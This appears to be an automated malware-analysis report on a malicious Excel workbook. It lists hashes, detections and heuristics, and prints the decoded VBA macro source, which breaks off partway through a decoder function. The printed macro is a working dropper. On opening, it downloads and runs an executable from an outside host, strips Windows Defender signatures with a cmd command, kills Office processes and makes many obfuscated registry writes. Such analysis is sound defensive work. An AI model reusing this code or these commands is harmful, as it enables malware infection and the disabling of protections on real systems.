Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 aaf271fd042da770…

MALICIOUS

Office (OOXML)

21.0 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-02-23
MD5: e44854540fed182dcb6bfb2374cf6e7b SHA-1: 59b9403ef62eb8d459351d8835f115ae57bc9511 SHA-256: aaf271fd042da770d0a0d85d4ed872812bf715dc58988470e8aab1af4629f95a
510 Risk Score

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")))
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set tskkills = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    .write xHttp.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://stemtopx.com/work/20.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 22034 bytes
SHA-256: 4931ce8bd34387aee63c62a50b0a1f01e1e42e2890fbc116b4691413f0eae961
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub tfastgdyugsuf()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim xHttp: Set xHttp = CreateObject(ETJBuhLeL(bFiJlSB8k("`âf§vM704D514D44560G7:6F6A6:767672", "Ix8GibZ4z")))
Dim bStrm: Set bStrm = CreateObject(ETJBuhLeL(bFiJlSB8k("ÂÁÖô¶F46400G71565047434F", "AQOH6ke2r")))
xHttp.Open "GET", "http://stemtopx.com/work/20.exe", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")), 2 '
End With
Shell (ETJBuhLeL(bFiJlSB8k("è‹CŸõÃ57514750517A7257404A4;417A5154414:4D51564G47550G475:47", "PYrSGYbFx")))
Set defender = CreateObject(ETJBuhLeL(bFiJlSB8k("›W‹³61504;52560G714:474A4A", "R31evr5K9")))
Dim Start
Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit"
defender.Run Start, vbHide
Set tskkills = CreateObject("WScript.Shell")
Dim STArTkwZkills
STArTkwZkills = "cmd /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit"
tskkills.Run STArTkwZkills, vbHide
Set wso = CreateObject(ETJBuhLeL(bFiJlSB8k("›W‹³61504;52560G714:474A4A", "R31evr5K9")))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("l–Tü´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "xsxFElisg")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÂÈÔ‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "LuXXJjiSt")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("¦ zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "C2j5sVMzx")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("è€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "t8DFUoGej")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A7460637543504G4;4G4551", "B05ls9Rxz")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("è€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "CN4Mk1AWY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "kFYqShidu")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "L12Z61XJE")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ˆ@Ú¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "kNI0IRIKx")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("( Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A7460637543504G4;4G4551", "V4H4yZWyG")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("šXŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "LVnSXqC7x")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "WROmgMHYL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" Vê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "VLYzx1kj7")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("œhª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "dkcg2YPVB")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" ^úâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A5257404A4;514:47507A71474157504;565;7A7460637543504G4;4G4551", "jxAaFaFqL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("î€Dœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "PfaW5IkV1")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" fŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "UZ1gsg7mb")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" fŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "yiORlLOTp")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(". Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "h5GFnr3qC")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A7460637543504G4;4G4551", "hxm6t08wi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("”xJB61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "pei5HeYp2")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("<6*|J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "uTfV4KmOY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("l–Tü´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "vjjOLIXzy")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("tF4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "gLThyo2Yf")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" vª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "nB2wQ7fTY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "kNSwWKz2I")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ä˜t<41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "f3XN5vmIk")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ceafMwdwW")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ü¨ |J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13130G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "x113Ods39")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("’hª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "kxjT7tuCj")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Rö” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ApDp8q9nV")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" NÚ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "tEKzNeYme")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("æ�dÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "EeYaIlCxX")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ŒHê‚´3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "ctbXRAqBZ")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÈÀÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "GK7UhDbQk")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("’hª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "UfqUNNJg8")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("\ö” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "Dh0Esbczo")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("tF4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13100G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "uheuC0eh3")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("¼(*|J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "YBsSh4XVU")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("HÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "TGtgRRqgD")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("nŽDœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "TbMgo2YGr")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Òè” J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "DDHQkiy1K")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("( Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "VPKYhBoq5")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("@ÞäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "YZsvodgLN")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("|¶ |J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "vpKxVRoMY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("´86@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "a7CxcWILc")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("FÞäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13160G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "CwIA6PQop")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("d¦t<41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "S3KRrCbqi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("& zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "sRJikuUPH")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("4:6@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "VUywFZT0P")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÚØôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "ygJAUeAVp")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("HÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "EV0cXCXra")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("x®  Š³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "zDZbxzi7n")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÈÀÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "VRM1qi6pt")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(" vª J3777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "SxOkr5sOY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ÆÐäâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13170G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "caznoKmHA")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "tJv3adPVi")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("ZæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "NT9PkrKxY")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("DæôÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A754D50467A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "gXnZVtJu3")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("  zÜtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "qyoCDB81S")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("Š¸4@61777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "hv0q3qI6R")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k(". Zœô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A724D554750724D4;4G567A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "FEgdbiCDL")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("NÎÄ¢ô³577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A476;4G5647504G4756644;4A47516;4G7274", "Q2g4mLqFr")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("€PúâtM577A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A4763565643414:474F474G56516;4G7274", "rp3G0CAU7")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
wso.RegWrite ETJBuhLeL(bFiJlSB8k("šXŠÂ41777A714D4456554350477A6F4;41504D514D44567A6D44444;41477A13140G127A675:41474A7A71474157504;565;7A72504D564741564746744;47557A664;5143404A47774G514344476A4D4143564;4D4G516;4G7274", "kIPorLm22")), 1, ETJBuhLeL(bFiJlSB8k("­ j‹´77D66756D7066", "uHOQhhyqw"))
End Sub
Public Function ETJBuhLeL(ByVal HqtxDJMeY As String)
Dim IFctgq1Z1 As Long, MYPFllgV2 As String, nn4twvlYf As String
    On Local Error Resume Next
    For IFctgq1Z1 = 1 To Len(HqtxDJMeY) Step 2
        MYPFllgV2 = MYPFllgV2 & Chr$(Val(bFiJlSB8k("ž8", "SpuMxLdt5") & Mid$(HqtxDJMeY, IFctgq1Z1, 2)))
    Next IFctgq1Z1
    ETJBuhLeL = MYPFllgV2
End Function
Public Function bFiJlSB8k(ByVal CrMcSviMY As String, ByVal CglbOe0H1 As String) As String
On Error Resume Next
Dim k7Sc8zGx2(0 To 255) As Integer, IFctgq1Z1 As Integer, third As Long, fourth() As Byte
fourth() = StrConv(CglbOe0H1, vbFromUnicode)
For IFctgq1Z1 = 0 To 255
    third = (third + k7Sc8zGx2(IFctgq1Z1) + fourth(IFctgq1Z1 Mod Len(CglbOe0H1))) Mod 256
    k7Sc8zGx2(IFctgq1Z1) = IFctgq1Z1
Next IFctgq1Z1
fourth() = StrConv(CrMcSviMY, vbFromUnicode)
